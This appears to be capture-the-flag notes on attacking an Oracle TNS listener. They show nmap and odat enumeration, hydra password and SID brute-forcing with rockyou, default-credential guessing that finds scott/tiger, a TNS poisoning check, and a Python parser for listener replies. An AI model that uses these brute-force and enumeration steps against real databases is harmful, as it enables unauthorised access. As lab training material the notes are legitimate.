# 4 :1521 Oracle TNS listener

```
$ nmap --script "oracle-tns-version" -p 1521 -T4 -sV silo.htb
PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

# checking with tnscmd10g
$ tnscmd10g status -h silo.htb
sending (CONNECT_DATA=(COMMAND=status)) to silo.htb:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))

# more information about error codes:
# https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7
# if TNS versions are incompatible, use the --10G flag

$ tnscmd10g status -h silo.htb --10G
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to silo.htb:1521
writing 181 bytes
reading
.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))

# listener could not authenticate the user.
# trying to brute-force the listener password using hydra (oracle-listener module)
$ hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 silo.htb oracle-listener
# PREFER RUNNING odat tnscmd -s silo.htb -p 1521 --[command]

$ odat tnscmd -s silo.htb -p 1521 --version
[1] (10.10.10.82:1521): Searching the version of the Oracle database server (10.10.10.82) listening on the port 1521
[+] The remote database version is: '11.2.0.2.0.'
# vulnerable to offline bruteforce

# sid enumeration
$ odat sidguesser -s "silo.htb" -p 1521 [--sids-file=/opt/oracle-tns/sids-oracle.txt]
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

$ hydra -L /opt/oracle-tns/sids-oracle.txt -s 1521 silo.htb oracle-sid
[1521][oracle-sid] host: silo.htb
[1521][oracle-sid] host: silo.htb   login: CLRExtProc
[1521][oracle-sid] host: silo.htb   login: PLSExtProc
[1521][oracle-sid] host: silo.htb   login: XE
1 of 1 target successfully completed, 4 valid passwords found

# time to find out user:pass

# using 0xdf's script
$ python oracle-userpass-brute.py silo.htb oracle_default_userpass.txt
# needs wordlist in format user:pass
Found scott / tiger

[OR]
# needs wordlist in format user/pass
$ sudo odat passwordguesser -s silo.htb -p 1521 -d 'XE' --accounts-file $(pwd)/oracle_default_userpass.txt [--sysdba]

# we can run an automated odat scan
$ odat all -s silo.htb -d XE -U SCOTT -P tiger --sysdba

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[truncated]
# a lot more information

Using https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests
# also https://0xdf.gitlab.io/img/ODAT_main_features_v2.0.jpg
```
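The two listener replies above can be read without the error-code reference open. The following is an added example, not part of the original write-up or of tnscmd10g/odat: it parses the nested `(KEY=VALUE)` reply, decodes `VSNNUM` into the dotted version, and names the `ERR` code. The function names are hypothetical; the replies are copied from the output above.

```python
# Listener error codes seen in the session above, with their Oracle message text.
TNS_ERRORS = {12618: "TNS:versions are incompatible",
              1189: "The listener could not authenticate the user"}

# Replies copied from the tnscmd10g output above (header bytes shown as dots).
REPLY_STATUS = '.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))'
REPLY_10G = '.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))'


def parse_descriptor(reply):
    """Parse the nested (KEY=VALUE) body of a listener reply into dicts."""
    start = reply.find("(DESCRIPTION=")
    if start < 0:
        raise ValueError("no (DESCRIPTION=...) block in reply")
    text, pos = reply[start:], 0

    def group():
        nonlocal pos
        out = {}
        while text[pos:pos + 1] == "(":
            eq = text.index("=", pos)
            key, pos = text[pos + 1:eq], eq + 1
            if text[pos:pos + 1] == "(":
                value = group()                # nested group, e.g. ERROR_STACK
            else:
                end = text.index(")", pos)     # scalar, possibly empty (TMP=)
                value, pos = text[pos:end], end
            if text[pos:pos + 1] != ")":
                raise ValueError("unbalanced parentheses at offset %d" % pos)
            pos += 1
            out[key] = value                   # a repeated key keeps its last value
        return out

    return group()


def decode_vsnnum(vsnnum):
    """Unpack VSNNUM bit fields (8.4.8.4.8 bits) into a dotted version."""
    n = int(vsnnum)
    fields = ((n >> 24) & 0xFF, (n >> 20) & 0xF, (n >> 12) & 0xFF, (n >> 8) & 0xF, n & 0xFF)
    return ".".join(str(f) for f in fields)


def summarize(reply):
    """Return the listener version and the meaning of its ERR code."""
    desc = parse_descriptor(reply)["DESCRIPTION"]
    err = int(desc["ERR"])
    return {"version": decode_vsnnum(desc["VSNNUM"]), "err": err,
            "meaning": TNS_ERRORS.get(err, "unknown, see Oracle error reference")}
```

`VSNNUM=186647040` decodes to the same 11.2.0.2.0 that nmap and odat report, and the `VERSION=169869568` value sent with `--10G` decodes to 10.2.0.1.0.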

